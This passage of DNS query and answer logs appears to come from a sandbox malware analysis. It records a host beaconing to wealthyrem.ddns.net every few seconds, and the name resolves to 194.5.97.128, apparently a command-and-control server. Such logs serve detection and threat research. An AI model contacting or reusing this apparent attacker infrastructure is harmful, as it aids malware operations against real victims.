Aug 3, 2021 19:04:56.573766947 CEST	192.168.2.3	8.8.8.8	0x68b3	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:58.795171022 CEST	192.168.2.3	8.8.8.8	0x9bf3	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:01.028712034 CEST	192.168.2.3	8.8.8.8	0x9486	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:03.249236107 CEST	192.168.2.3	8.8.8.8	0xed32	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:05.473995924 CEST	192.168.2.3	8.8.8.8	0x26d6	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:07.687529087 CEST	192.168.2.3	8.8.8.8	0xef65	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:10.196857929 CEST	192.168.2.3	8.8.8.8	0x173b	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:12.714188099 CEST	192.168.2.3	8.8.8.8	0x71dc	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:14.921039104 CEST	192.168.2.3	8.8.8.8	0xcd49	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:17.109873056 CEST	192.168.2.3	8.8.8.8	0x954d	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:19.332648039 CEST	192.168.2.3	8.8.8.8	0x4205	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:21.520255089 CEST	192.168.2.3	8.8.8.8	0x8926	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:23.720985889 CEST	192.168.2.3	8.8.8.8	0x821	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:25.923397064 CEST	192.168.2.3	8.8.8.8	0x96ce	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:28.157883883 CEST	192.168.2.3	8.8.8.8	0x4e8	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:30.346065044 CEST	192.168.2.3	8.8.8.8	0xa5e8	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:32.537942886 CEST	192.168.2.3	8.8.8.8	0x555d	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:34.719111919 CEST	192.168.2.3	8.8.8.8	0x5059	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:36.924958944 CEST	192.168.2.3	8.8.8.8	0x7b1b	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:39.130440950 CEST	192.168.2.3	8.8.8.8	0x428e	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:41.315402031 CEST	192.168.2.3	8.8.8.8	0x8b71	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:43.540107012 CEST	192.168.2.3	8.8.8.8	0x8af6	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:45.754501104 CEST	192.168.2.3	8.8.8.8	0x86b1	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:47.940515041 CEST	192.168.2.3	8.8.8.8	0x2a2a	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:50.126950026 CEST	192.168.2.3	8.8.8.8	0x278f	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:52.331804991 CEST	192.168.2.3	8.8.8.8	0x62f6	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:54.534140110 CEST	192.168.2.3	8.8.8.8	0x9faf	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:56.720890045 CEST	192.168.2.3	8.8.8.8	0x7fcc	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:58.957617998 CEST	192.168.2.3	8.8.8.8	0x4bf7	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:01.144287109 CEST	192.168.2.3	8.8.8.8	0xab5e	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:03.333826065 CEST	192.168.2.3	8.8.8.8	0xc0e9	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:05.550487041 CEST	192.168.2.3	8.8.8.8	0xc40d	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:07.741825104 CEST	192.168.2.3	8.8.8.8	0x3c4c	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:09.941957951 CEST	192.168.2.3	8.8.8.8	0xba84	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:12.149107933 CEST	192.168.2.3	8.8.8.8	0x71aa	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:15.198581934 CEST	192.168.2.3	8.8.8.8	0x1519	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:17.397550106 CEST	192.168.2.3	8.8.8.8	0x4316	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:19.587477922 CEST	192.168.2.3	8.8.8.8	0xd753	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:21.772907972 CEST	192.168.2.3	8.8.8.8	0x1990	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:23.959944010 CEST	192.168.2.3	8.8.8.8	0x3ede	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:26.166287899 CEST	192.168.2.3	8.8.8.8	0xe3a2	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:28.366338015 CEST	192.168.2.3	8.8.8.8	0x667	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:30.600789070 CEST	192.168.2.3	8.8.8.8	0xcc52	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:32.799395084 CEST	192.168.2.3	8.8.8.8	0xd900	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:34.995313883 CEST	192.168.2.3	8.8.8.8	0xe662	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:37.197623014 CEST	192.168.2.3	8.8.8.8	0x75a	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:39.385412931 CEST	192.168.2.3	8.8.8.8	0xbb11	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:41.637833118 CEST	192.168.2.3	8.8.8.8	0x1152	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:43.841898918 CEST	192.168.2.3	8.8.8.8	0x997c	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:46.065788031 CEST	192.168.2.3	8.8.8.8	0x8a48	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:48.259576082 CEST	192.168.2.3	8.8.8.8	0xc1c6	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:50.478462934 CEST	192.168.2.3	8.8.8.8	0x75e3	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:52.664053917 CEST	192.168.2.3	8.8.8.8	0xf2df	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:54.869762897 CEST	192.168.2.3	8.8.8.8	0x7414	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:57.063138962 CEST	192.168.2.3	8.8.8.8	0x5c6f	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:59.274760008 CEST	192.168.2.3	8.8.8.8	0x25b1	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:01.536617041 CEST	192.168.2.3	8.8.8.8	0xa7a9	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:03.743144989 CEST	192.168.2.3	8.8.8.8	0x7bc4	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:05.939706087 CEST	192.168.2.3	8.8.8.8	0xbda9	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:08.149225950 CEST	192.168.2.3	8.8.8.8	0x106b	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:10.377194881 CEST	192.168.2.3	8.8.8.8	0x458d	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:12.588496923 CEST	192.168.2.3	8.8.8.8	0x33bc	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:14.790198088 CEST	192.168.2.3	8.8.8.8	0x57de	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:17.232678890 CEST	192.168.2.3	8.8.8.8	0x2f60	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:19.495464087 CEST	192.168.2.3	8.8.8.8	0x4f1a	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:21.703489065 CEST	192.168.2.3	8.8.8.8	0xba29	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:23.890366077 CEST	192.168.2.3	8.8.8.8	0x412d	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:26.093004942 CEST	192.168.2.3	8.8.8.8	0xee6f	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:28.307390928 CEST	192.168.2.3	8.8.8.8	0x2238	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:30.528975964 CEST	192.168.2.3	8.8.8.8	0x26fd	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:32.768989086 CEST	192.168.2.3	8.8.8.8	0x7e26	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:35.004992008 CEST	192.168.2.3	8.8.8.8	0xeb55	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:37.205674887 CEST	192.168.2.3	8.8.8.8	0xa36	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:39.391149044 CEST	192.168.2.3	8.8.8.8	0x1bcf	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:41.593108892 CEST	192.168.2.3	8.8.8.8	0x30fb	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:43.791191101 CEST	192.168.2.3	8.8.8.8	0xd400	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:45.981834888 CEST	192.168.2.3	8.8.8.8	0xf1d3	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:48.208339930 CEST	192.168.2.3	8.8.8.8	0xeebb	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:50.405112028 CEST	192.168.2.3	8.8.8.8	0x55eb	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:52.700977087 CEST	192.168.2.3	8.8.8.8	0x9b87	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:54.903065920 CEST	192.168.2.3	8.8.8.8	0x8cea	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:57.106620073 CEST	192.168.2.3	8.8.8.8	0xbf11	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:59.292171955 CEST	192.168.2.3	8.8.8.8	0x1642	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:08:01.496685028 CEST	192.168.2.3	8.8.8.8	0x6602	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:08:03.698606014 CEST	192.168.2.3	8.8.8.8	0x2043	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Aug 3, 2021 19:01:32.150788069 CEST	8.8.8.8	192.168.2.3	0x4f55	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:01:34.349643946 CEST	8.8.8.8	192.168.2.3	0xc0f9	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:01:36.548902035 CEST	8.8.8.8	192.168.2.3	0xb853	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:01:38.753732920 CEST	8.8.8.8	192.168.2.3	0x4c0	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:01:40.941567898 CEST	8.8.8.8	192.168.2.3	0x8464	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:01:43.134553909 CEST	8.8.8.8	192.168.2.3	0x1298	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:01:45.317775965 CEST	8.8.8.8	192.168.2.3	0x2508	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:01:47.786495924 CEST	8.8.8.8	192.168.2.3	0x95dd	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:01:50.345753908 CEST	8.8.8.8	192.168.2.3	0x91d3	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:01:52.544380903 CEST	8.8.8.8	192.168.2.3	0x3f8e	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:01:54.762475014 CEST	8.8.8.8	192.168.2.3	0x64f4	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:01:56.959481955 CEST	8.8.8.8	192.168.2.3	0x58e4	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:01:59.165488958 CEST	8.8.8.8	192.168.2.3	0xae14	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:01.352756977 CEST	8.8.8.8	192.168.2.3	0x9d7b	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:03.588093042 CEST	8.8.8.8	192.168.2.3	0xf106	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:07.945453882 CEST	8.8.8.8	192.168.2.3	0xcfbc	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:10.148989916 CEST	8.8.8.8	192.168.2.3	0xb28d	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:12.380321980 CEST	8.8.8.8	192.168.2.3	0xf8d3	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:14.720417976 CEST	8.8.8.8	192.168.2.3	0xabd4	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:16.986277103 CEST	8.8.8.8	192.168.2.3	0x296	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:19.246603966 CEST	8.8.8.8	192.168.2.3	0x4268	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:21.462229967 CEST	8.8.8.8	192.168.2.3	0xb8c4	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:23.651187897 CEST	8.8.8.8	192.168.2.3	0xd8c3	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:25.846793890 CEST	8.8.8.8	192.168.2.3	0xe46d	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:28.050857067 CEST	8.8.8.8	192.168.2.3	0xe1a4	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:30.252289057 CEST	8.8.8.8	192.168.2.3	0x95e9	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:32.456573009 CEST	8.8.8.8	192.168.2.3	0xef1	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:34.704158068 CEST	8.8.8.8	192.168.2.3	0xb849	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:36.915652990 CEST	8.8.8.8	192.168.2.3	0x4e81	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:39.113240957 CEST	8.8.8.8	192.168.2.3	0xd3b6	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:41.475824118 CEST	8.8.8.8	192.168.2.3	0x6608	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:43.676137924 CEST	8.8.8.8	192.168.2.3	0x7d7e	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:45.884254932 CEST	8.8.8.8	192.168.2.3	0x8d99	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:48.070511103 CEST	8.8.8.8	192.168.2.3	0xbc7c	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:50.297590971 CEST	8.8.8.8	192.168.2.3	0xf886	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:52.508933067 CEST	8.8.8.8	192.168.2.3	0xff	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:54.752672911 CEST	8.8.8.8	192.168.2.3	0x7c6b	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:57.072422028 CEST	8.8.8.8	192.168.2.3	0xd11b	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:00.250510931 CEST	8.8.8.8	192.168.2.3	0x8a1b	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:02.455005884 CEST	8.8.8.8	192.168.2.3	0xa63	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:04.646204948 CEST	8.8.8.8	192.168.2.3	0x48fd	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:06.928741932 CEST	8.8.8.8	192.168.2.3	0x9167	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:09.116533041 CEST	8.8.8.8	192.168.2.3	0x62ed	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:11.308238029 CEST	8.8.8.8	192.168.2.3	0xf165	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:13.514050961 CEST	8.8.8.8	192.168.2.3	0x3d90	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:15.711858988 CEST	8.8.8.8	192.168.2.3	0xf3a8	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:17.903259039 CEST	8.8.8.8	192.168.2.3	0x1e50	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:20.122246981 CEST	8.8.8.8	192.168.2.3	0xea4b	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:22.355321884 CEST	8.8.8.8	192.168.2.3	0x9268	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:24.558729887 CEST	8.8.8.8	192.168.2.3	0x2dba	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:26.767282009 CEST	8.8.8.8	192.168.2.3	0xe4f0	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:28.955493927 CEST	8.8.8.8	192.168.2.3	0xf843	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:31.168095112 CEST	8.8.8.8	192.168.2.3	0x7112	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:33.353689909 CEST	8.8.8.8	192.168.2.3	0x5739	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:35.545561075 CEST	8.8.8.8	192.168.2.3	0x752	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:37.810373068 CEST	8.8.8.8	192.168.2.3	0xa606	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:40.006287098 CEST	8.8.8.8	192.168.2.3	0x5794	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:42.196994066 CEST	8.8.8.8	192.168.2.3	0xc21d	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:44.389393091 CEST	8.8.8.8	192.168.2.3	0x50ae	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:46.604208946 CEST	8.8.8.8	192.168.2.3	0xab70	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:48.798176050 CEST	8.8.8.8	192.168.2.3	0xf7a2	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:50.985971928 CEST	8.8.8.8	192.168.2.3	0xc7d0	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:53.231578112 CEST	8.8.8.8	192.168.2.3	0x2ac8	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:55.451174021 CEST	8.8.8.8	192.168.2.3	0xdb67	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:57.659317017 CEST	8.8.8.8	192.168.2.3	0x8876	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:59.858313084 CEST	8.8.8.8	192.168.2.3	0xdd4a	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:02.451447010 CEST	8.8.8.8	192.168.2.3	0x40a4	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:05.058403969 CEST	8.8.8.8	192.168.2.3	0xc20b	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:07.278501987 CEST	8.8.8.8	192.168.2.3	0xe42a	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:09.519002914 CEST	8.8.8.8	192.168.2.3	0xba28	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:11.806792974 CEST	8.8.8.8	192.168.2.3	0xddb0	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:14.118324041 CEST	8.8.8.8	192.168.2.3	0xfeb0	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:16.308108091 CEST	8.8.8.8	192.168.2.3	0xa694	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:16.920137882 CEST	8.8.8.8	192.168.2.3	0xdfc2	No error (0)	prda.aadg.msidentity.com	www.tm.a.prd.aadg.akadns.net		CNAME (Canonical name)	IN (0x0001)
Aug 3, 2021 19:04:18.513947010 CEST	8.8.8.8	192.168.2.3	0xa8c7	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:20.731728077 CEST	8.8.8.8	192.168.2.3	0x5126	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:22.938019991 CEST	8.8.8.8	192.168.2.3	0xa630	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:25.258712053 CEST	8.8.8.8	192.168.2.3	0xf5b	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:27.443067074 CEST	8.8.8.8	192.168.2.3	0xc235	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:29.647238970 CEST	8.8.8.8	192.168.2.3	0x7a7c	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:32.033607960 CEST	8.8.8.8	192.168.2.3	0xd305	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:34.233795881 CEST	8.8.8.8	192.168.2.3	0x8c28	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:36.463515043 CEST	8.8.8.8	192.168.2.3	0x8a03	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:38.686813116 CEST	8.8.8.8	192.168.2.3	0x6df8	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:40.992608070 CEST	8.8.8.8	192.168.2.3	0x5512	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:43.237854958 CEST	8.8.8.8	192.168.2.3	0x346e	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:45.437777042 CEST	8.8.8.8	192.168.2.3	0xbe48	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:47.660789967 CEST	8.8.8.8	192.168.2.3	0x2dc6	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
